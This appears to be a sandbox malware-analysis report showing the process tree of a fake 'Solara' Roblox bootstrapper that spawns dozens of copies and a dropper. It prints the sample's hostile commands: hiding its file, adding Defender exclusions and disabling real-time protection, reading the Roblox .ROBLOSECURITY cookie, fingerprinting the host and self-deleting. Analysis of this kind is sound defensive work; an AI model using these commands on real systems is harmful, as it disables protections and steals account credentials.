PID 4612 wrote to memory of 3960	4612	SolaraBootstrapper.exe	105
PID 4612 wrote to memory of 3960	4612	SolaraBootstrapper.exe	105
PID 1028 wrote to memory of 4468	1028	dIIhost.exe	106
PID 1028 wrote to memory of 4468	1028	dIIhost.exe	106
PID 4612 wrote to memory of 1480	4612	SolaraBootstrapper.exe	108
PID 4612 wrote to memory of 1480	4612	SolaraBootstrapper.exe	108
PID 4612 wrote to memory of 2464	4612	SolaraBootstrapper.exe	143
PID 4612 wrote to memory of 2464	4612	SolaraBootstrapper.exe	143
PID 4612 wrote to memory of 2464	4612	SolaraBootstrapper.exe	143
PID 1028 wrote to memory of 4372	1028	dIIhost.exe	110
PID 1028 wrote to memory of 4372	1028	dIIhost.exe	110
PID 2464 wrote to memory of 4800	2464	SolaraB.exe	113
PID 2464 wrote to memory of 4800	2464	SolaraB.exe	113
PID 2464 wrote to memory of 4800	2464	SolaraB.exe	113
PID 1028 wrote to memory of 4336	1028	dIIhost.exe	149
PID 1028 wrote to memory of 4336	1028	dIIhost.exe	149
PID 1028 wrote to memory of 3636	1028	dIIhost.exe	116
PID 1028 wrote to memory of 3636	1028	dIIhost.exe	116
PID 1028 wrote to memory of 4060	1028	dIIhost.exe	118
PID 1028 wrote to memory of 4060	1028	dIIhost.exe	118
PID 3960 wrote to memory of 1388	3960	SolaraBootstrapper.exe	156
PID 3960 wrote to memory of 1388	3960	SolaraBootstrapper.exe	156
PID 3960 wrote to memory of 3212	3960	SolaraBootstrapper.exe	121
PID 3960 wrote to memory of 3212	3960	SolaraBootstrapper.exe	121
PID 3960 wrote to memory of 4900	3960	SolaraBootstrapper.exe	122
PID 3960 wrote to memory of 4900	3960	SolaraBootstrapper.exe	122
PID 3960 wrote to memory of 4900	3960	SolaraBootstrapper.exe	122
PID 4900 wrote to memory of 2916	4900	SolaraB.exe	123
PID 4900 wrote to memory of 2916	4900	SolaraB.exe	123
PID 4900 wrote to memory of 2916	4900	SolaraB.exe	123
PID 1028 wrote to memory of 2004	1028	dIIhost.exe	124
PID 1028 wrote to memory of 2004	1028	dIIhost.exe	124

Views/modifies file attributes 1 TTPs 29 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2308	attrib.exe
3220	attrib.exe
3892	attrib.exe
3872	attrib.exe
2124	attrib.exe
5072	attrib.exe
656	attrib.exe
3816	attrib.exe
4536	attrib.exe
2116	attrib.exe
4760	attrib.exe
3552	attrib.exe
2600	attrib.exe
2476	attrib.exe
2772	attrib.exe
3812	attrib.exe
656	attrib.exe
180	attrib.exe
1836	attrib.exe
1868	attrib.exe
3636	attrib.exe
2948	attrib.exe
3044	attrib.exe
1092	attrib.exe
4624	attrib.exe
3776	attrib.exe
5052	attrib.exe
4588	attrib.exe
5092	attrib.exe

C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\862e555bc983728ac0d7e39fed087a79ec18c5db7208c839aba4db3f6bff0f06_NeikiAnalytics.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3552
- C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
  "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3440
- - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4612
  - - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3960
    - - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1388
      - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        6⤵
        Executes dropped EXE
        
        PID:1320
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2972
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1204
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        9⤵
        Executes dropped EXE
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        10⤵
        Executes dropped EXE
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1744
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        12⤵
        Executes dropped EXE
        
        PID:736
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        14⤵
        Executes dropped EXE
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        15⤵
        Executes dropped EXE
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:384
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:368
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        19⤵
        Checks computer location settings
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        20⤵
        Checks computer location settings
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        21⤵
        Checks computer location settings
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        22⤵
        Checks computer location settings
        
        PID:3636
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        23⤵
        Checks computer location settings
        
        PID:1532
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        24⤵
        Checks computer location settings
        
        PID:3180
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        25⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        26⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        27⤵
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        28⤵
        Checks computer location settings
        
        PID:1768
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        29⤵
        Checks computer location settings
        
        PID:2228
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        30⤵
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        31⤵
        Checks computer location settings
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        32⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        33⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        34⤵
        Checks computer location settings
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        35⤵
        Checks computer location settings
        
        PID:3100
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        36⤵
        Checks computer location settings
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        37⤵
        Checks computer location settings
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        38⤵
        Checks computer location settings
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        39⤵
        Checks computer location settings
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        40⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        41⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        42⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        43⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        44⤵
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        45⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        46⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        47⤵
        
        PID:1092
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        48⤵
        
        PID:1784
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        49⤵
        
        PID:4156
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        50⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        51⤵
        
        PID:736
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        52⤵
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        53⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        54⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        55⤵
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        56⤵
        
        PID:1596
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        57⤵
        
        PID:3892
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        58⤵
        
        PID:2864
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        59⤵
        
        PID:2336
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        60⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        61⤵
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        62⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        63⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        64⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        65⤵
        
        PID:216
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        66⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        67⤵
        
        PID:6060
        
        C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        68⤵
        
        PID:5352
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        68⤵
        
        PID:1524
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        69⤵
        
        PID:5520
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        69⤵
        Views/modifies file attributes
        
        PID:2124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        69⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        69⤵
        
        PID:2400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        69⤵
        
        PID:5232
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        68⤵
        
        PID:5276
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        69⤵
        
        PID:5512
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        67⤵
        
        PID:6096
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        67⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        68⤵
        
        PID:2080
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        66⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        66⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        67⤵
        
        PID:5468
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        68⤵
        
        PID:5936
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        69⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        65⤵
        
        PID:116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        66⤵
        
        PID:5048
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        66⤵
        Views/modifies file attributes
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        66⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        66⤵
        
        PID:2172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        66⤵
        
        PID:1336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        66⤵
        
        PID:5232
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        66⤵
        
        PID:5524
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        66⤵
        
        PID:5592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        66⤵
        
        PID:5696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        66⤵
        
        PID:5828
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        66⤵
        Detects videocard installed
        
        PID:5972
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        66⤵
        
        PID:3036
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        67⤵
        Runs ping.exe
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        65⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        66⤵
        
        PID:844
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        67⤵
        
        PID:5248
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        68⤵
        
        PID:5164
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        64⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        64⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        65⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        66⤵
        
        PID:5680
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        67⤵
        
        PID:5764
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        63⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        63⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        64⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        65⤵
        
        PID:988
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        66⤵
        
        PID:1668
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        66⤵
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        62⤵
        
        PID:2524
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        63⤵
        
        PID:3596
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        63⤵
        Views/modifies file attributes
        
        PID:3776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
        63⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        63⤵
        
        PID:2224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        63⤵
        
        PID:4484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        63⤵
        
        PID:3596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        63⤵
        
        PID:4348
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        64⤵
        
        PID:644
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        63⤵
        
        PID:3892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        63⤵
        
        PID:1420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        63⤵
        
        PID:4784
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        63⤵
        Detects videocard installed
        
        PID:4664
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
        63⤵
        
        PID:3336
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        64⤵
        Runs ping.exe
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        62⤵
        
        PID:1600
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        63⤵
        
        PID:3036
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        64⤵
        
        PID:2972
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        65⤵
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        61⤵
        
        PID:4576
        
        C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
        61⤵
        
        PID:3780
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
        62⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
        63⤵
        
        PID:4368
        
        C:\WinRAR\UnZiper.exe
        
        "C:\WinRAR\UnZiper.exe"
        64⤵
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        60⤵
        
        PID:4960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        61⤵
        
        PID:4448
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
        61⤵
        Views/modifies file attributes
        
        PID:3872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
